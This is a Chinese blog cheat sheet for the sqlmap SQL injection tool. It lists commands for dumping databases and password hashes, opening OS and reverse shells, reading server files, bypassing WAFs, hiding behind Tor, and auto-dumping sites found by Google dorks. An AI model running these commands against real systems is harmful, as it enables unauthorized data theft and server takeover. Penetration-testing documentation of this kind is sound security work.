【SQLmap】常用命令

文章目录

实际使用案例
常用命令
- 基本命令
- 数据库指纹识别
- 用户信息
- 用户权限
- 数据库枚举
- 数据导出
- 密码哈希
- 操作系统命令执行
- 文件操作
- 代理和网络
- 参数指定
- 保存恢复
- 自动搜索注入
- 智能模式
- 等级设置
- 自动注入
- WAF 绕过
- 杂项
- 帮助和支持

SQLmap 是一款开源的自动化 SQL 注入检测和利用工具，广泛用于网络安全的渗透测试中。它支持广泛的数据库服务器，能够自动化地检测和利用大多数的 SQL 注入漏洞，以及对数据库服务器进行不同程度的访问和控制。

在这里插入图片描述

实际使用案例

假设你已经确定一个 URL 存在 SQL 注入漏洞，你可以使用以下命令来进一步探测和利用它：

sqlmap -u "http://example.com/index.php?id=1" --dbs

这个命令会列出所有数据库。

接下来，如果你想获取特定数据库中的所有表名：

sqlmap -u "http://example.com/index.php?id=1" -D database_name --tables

若要导出某个表的数据：

sqlmap -u "http://example.com/index.php?id=1" -D database_name -T table_name --dump

常用命令

以下是 SQLmap 的一些重要命令和功能：

基本命令

sqlmap -u "TARGET_URL"：对指定的 URL 进行注入测试。

数据库指纹识别

--banner：获取数据库的详细信息。
--dbms "Mysql"：指定数据库类型。

用户信息

--users：列出数据库中的所有用户。
--current-user：确定当前连接的数据库用户。
--is-dba：检查当前用户是否具有数据库管理员权限。

用户权限

--privileges：列出数据库用户的权限。
--privileges -U root：查看指定用户权限。

数据库枚举

--dbs：列出所有数据库。
-D DATABASE_NAME --tables：列出指定数据库的所有表。
-D DATABASE_NAME -T TABLE_NAME --columns：列出指定表的所有列。
--start 1 --stop 20：列出 20 条。

数据导出

-D DATABASE_NAME -T TABLE_NAME -C COLUMN_NAME --dump：导出指定数据库、表或列的数据。

密码哈希

--passwords：尝试获取数据库用户的密码哈希。

操作系统命令执行

--os-cmd="COMMAND"：在支持的数据库上执行操作系统命令。
--os-shell：提供一个交互式的 shell 环境。
--udf-inject：导入用户自定义函数（获取系统权限）。
--os-pwn ：反弹 shell。

文件操作

--file-read=FILE_PATH：从数据库服务器读取文件。
--file-write=FILE_PATH --file-dest=DEST_PATH：将文件写入数据库服务器。
--reg-read ：读取 win 系统注册表

代理和网络

--proxy=PROXY：通过指定的代理服务器进行 SQLmap 的所有请求。
--tor：使用 Tor 匿名网络。
--delay=DELAY_SECONDS：设置请求之间的延迟时间。
--timeout=TIMEOUT_SECONDS：设置请求的超时时间。

参数指定

--string"STRING_ON_TRUE_PAGE"：指定关键词。
--data "id=3" ：设置post参数。
--cookie "COOKIE_VALUE" ：设置cookie。
--random-agent：使用随机 User-Agent 头发送请求。
--sql-shell ：执行指定 sql 命令

保存恢复

--dbs-o "sqlmap.log"：保存进度。
--dbs -o "sqlmap.log" --resume"：恢复进度。

自动搜索注入

sqlmap -g "google 语法" --dump-all --batch：搜索注入点自动跑出所有字段。

智能模式

--smart：启用智能模式，使用更少的查询来确定数据库的类型，以及数据库中表和字段的名称。

等级设置

--level：这个选项用来定义测试的级别。

自动注入

--batch：无需交互，自动执行。

WAF 绕过

--tamper=TAMPER_SCRIPTS：使用篡改脚本来尝试绕过 WAF。

杂项

--beep：发现 SQL 注入时发出蜂鸣声。
--check-payload：检查 IDS 对注入有效负载的检测。
--forms：解析和测试目标 URL 的表单。

帮助和支持

sqlmap -h 或 sqlmap --help：显示帮助信息。
sqlmap -v：显示程序的版本号。

想要成为无论多么悲伤的时候，也能够漂亮微笑的人吧。

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.mzph.cn/news/863917.shtml

如若内容造成侵权/违法违规/事实不符，请联系多彩编程网进行投诉反馈email:809451989@qq.com，一经查实，立即删除！